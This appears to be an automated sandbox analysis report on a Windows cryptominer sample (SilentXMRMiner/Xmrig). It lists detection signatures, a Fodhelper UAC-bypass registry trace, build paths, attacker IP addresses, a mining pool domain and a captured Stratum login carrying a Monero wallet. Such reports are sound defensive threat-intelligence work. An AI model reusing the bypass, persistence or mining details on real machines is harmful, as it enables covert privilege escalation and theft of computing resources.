Windows Analysis Report
e7WMhx18XN.exe

Overview

General Information

Sample name: e7WMhx18XN.exe
renamed because original name is a hash value
Original sample name: 38be83afea1e906c05e5b851253cbc6a.exe
Analysis ID: 1528504
MD5: 38be83afea1e906c05e5b851253cbc6a
SHA1: 85841044836479ac3c0b9fb7f1f28928621a4a99
SHA256: 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
Tags: 32CoinMinerexe
Infos:

Detection

SilentXMRMiner, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
UAC bypass detected (Fodhelper)
Yara detected SilentXMRMiner
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected Stratum mining protocol
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: e7WMhx18XN.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\AppData\Local\Temp\services64.exe Avira: detection malicious, Label: HEUR/AGEN.1344202
Source: C:\Users\user\AppData\Local\Temp\paint.exe Avira: detection malicious, Label: HEUR/AGEN.1344202
Multi AV Scanner detection for submitted file
Source: e7WMhx18XN.exe ReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\services64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\paint.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: e7WMhx18XN.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 56_2_00401000

Privilege Escalation
barindex
UAC bypass detected (Fodhelper)
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Registry value created: NULL cmd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Registry value created: DelegateExecute Jump to behavior

Bitcoin Miner
barindex
Yara detected SilentXMRMiner
Source: Yara match File source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6140, type: MEMORYSTR
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.10:54464 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66 37 6b 56 48 46 57 73 38 62 70 72 51 4a 70 4d 50 78 44 63 52 78 36 52 54 51 78 5a 57 37 72 42 79 69 58 55 34 43 6e 4d 44 71 72 48 4c 34 73 37 56 45 70 4d 47 38 51 6a 37 37 79 67 64 44 52 76 6b 42 55 33 4e 63 64 31 57 78 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 35 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 61 73 74 72 6f 62 77 74 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
Found strings related to Crypto-Mining
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Uses 32bit PE files
Source: e7WMhx18XN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: e7WMhx18XN.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 147.185.221.22 ports 2,4,5,7,54872,8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:54593 -> 147.185.221.22:54872
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.76.89.70 45.76.89.70
Source: Joe Sandbox View IP Address: 147.185.221.22 147.185.221.22
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.10:58455 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.10:54464 -> 45.76.89.70:80
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: pool.hashvault.pro
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000038.00000002.1931071513.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1992736988.0000000003357000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1997379038.0000000003807000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000038.00000002.1931658908.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft6#ZQ
Source: conhost.exe, 00000014.00000002.1399936831.00000113DCE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000000.00000002.1367337795.0000010D91A13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
